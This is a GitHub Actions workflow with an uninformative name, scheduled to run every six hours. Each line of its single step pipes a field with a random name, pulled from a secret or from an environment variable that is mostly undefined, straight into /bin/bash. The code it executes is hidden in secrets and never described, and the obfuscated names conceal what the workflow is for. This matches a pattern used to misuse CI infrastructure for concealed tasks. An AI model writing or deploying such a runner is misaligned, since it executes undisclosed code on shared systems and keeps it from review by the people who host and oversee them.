name: transparentinsurance

on:
  workflow_dispatch:
  schedule:
    - cron: '5 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: transparentinsurance
        env:
          u5: ${{ secrets.u5 }}
        run: |
          echo $u5 | jq -r .jzcux229 | /bin/bash
          echo $e8237 | jq -r .k09893 | /bin/bash
          echo $a3 | jq -r .vqwag7 | /bin/bash
          echo $ucbm478 | jq -r .acjqi4692 | /bin/bash
          echo $pqhws977 | jq -r .rgo40 | /bin/bash
          echo $blpzw37 | jq -r .ex516 | /bin/bash
          echo $niucu79 | jq -r .i3 | /bin/bash
          echo $wqwpu93 | jq -r .fyf9 | /bin/bash
          echo $wx6642 | jq -r .lwzd28835 | /bin/bash
          echo $zsjyj7 | jq -r .lrvdf0554 | /bin/bash
          echo $z4 | jq -r .ig35393 | /bin/bash
          echo $bkcaq753 | jq -r .luk90628 | /bin/bash
          echo $iiv7 | jq -r .r1 | /bin/bash

